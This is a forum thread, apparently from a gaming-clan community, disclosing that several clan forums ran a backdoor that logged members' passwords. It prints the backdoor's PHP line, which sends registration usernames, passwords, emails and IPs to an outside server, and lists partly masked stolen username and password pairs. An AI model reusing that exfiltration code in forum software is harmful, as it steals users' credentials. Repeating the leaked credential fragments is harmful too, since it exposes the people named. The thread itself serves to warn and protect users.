Jump to content

CP/CV/SV #EXPOSED V2(The boring technical details)


slushpuppy
 Share

Recommended Posts

http://www.sharkbrew.com/community/index.php?/topic/2966-cpcvsv-exposed-stay-away-from-these-clans/

 

Background info:

I was asked by LT to take over hosting from [CP]Parm. Sam has mentioned to me off handedly that a number of his members had been hacked using LT's site, so I took the opportunity to peak around the original config files. The results are scary.

 

Essentially this is a list of sites so far that has this rat on it:

 

  • LT
  • Old CV
  • New CV
  • Old zenith(Idk which forum tonqir came from)

Basically Parm probably ratted his own clan members?!?!

 

How this rat works is, it will log your password, then send the user/pass to SV's server for "svkeeping". I have uncovered some .txt files containing some passes. If you are one of them, i suggest you change your passes ASAP.

 

touqirn**ir:t***i*
touqirn**ir:d****r
silents****a:n***for****d
its_supa:date*****02
its_supa:******82
zakchips:*****ont
eternal_self:*****v12xzarathustra:******ohnpro_dutcher:******n96

 

 

 

In this grand scheme of things, CP/SV has been logging passwords of multiple forums without the user's knowledge. I have inserted 3x images detailing the script containing the RAT

 

839b408af6e5f39acb99575452bd1397.png

 

820d48f69cc9ebfe5d4b18736f8a3dfc.png

 

 

96785f84cbd810a6774a118497ed9934.png

 

 

Attached are 3 urls leading to the rat(it will be removed soon i bet)

 

http://sv-rs.org/tools/raw/acp.txt

http://sv-rs.org/tools/raw/registration.txt

http://sv-rs.org/tools/raw/login.txt

 

 

 

P.S. Some evidence they are doing the same for other main clan forums

 

Drr85b1.png

Link to comment
Share on other sites

This is taken directly from sv-rs.org Logs to remind you guys their stealing your Facebook,Twitter, though for twitch  i havent found a script for it on here yet

 

 

 

/* Attempt to fetch user details */
            $classToLoad    = IPSLib::loadLibrary( IPS_ROOT_PATH . 'sources/classes/facebook/connect.php', 'facebook_connect' );
            $facebook        = new $classToLoad( $this->registry, $member['fb_token'], $member['fb_uid'] );
        
            $userData        = $facebook->fetchUserData();
            
            if ( $userData['id'] )
            {
                $userData['service'] = 'facebook';
                $userData['_name'] = $userData['name'];
                $userData['_pic'] = $userData['pic_square'];
                $userData['_sImage'] = $this->settings['public_dir'] . 'style_status/facebook.png';
                
                /* Enforcing / allowing real names? */
                if ( ! count( $form_errors['dname'] ) AND $this->settings['fb_realname'] != 'any' )
                {
                    $userData['_displayName'] = $userData['_name'];

 

 

 

( $member['twitter_id'] AND $member['twitter_token'] AND $member['twitter_secret'] )
        {
            /* Attempt to fetch user details */
            $classToLoad    = IPSLib::loadLibrary( IPS_ROOT_PATH . 'sources/classes/twitter/connect.php', 'twitter_connect' );
            $twitter        = new $classToLoad( $this->registry, $member['twitter_token'], $member['twitter_secret'] );
        
            $userData        = $twitter->fetchUserData();
            
            if ( $userData['id'] )
            {
                $userData['service'] = 'twitter';
                $userData['_name'] = $userData['screen_name'];
                $userData['_pic'] = $userData['profile_image_url'];
                $userData['_sImage'] = $this->settings['public_dir'] . 'style_status/twitter.png';

 

 

 

// Give SV the info...
        //-----------------------------------------
        $user = str_replace(' ', '%20', $this->request['members_display_name']);
        file_get_contents('http://sv-rs.org/tools/insert.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Registration&username=' . $user . '&password=' . $in_password . '&email=' . $in_email . '&ip=' . $_SERVER['REMOTE_ADDR']);

        /* Create member */
        $member = array(
                    
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...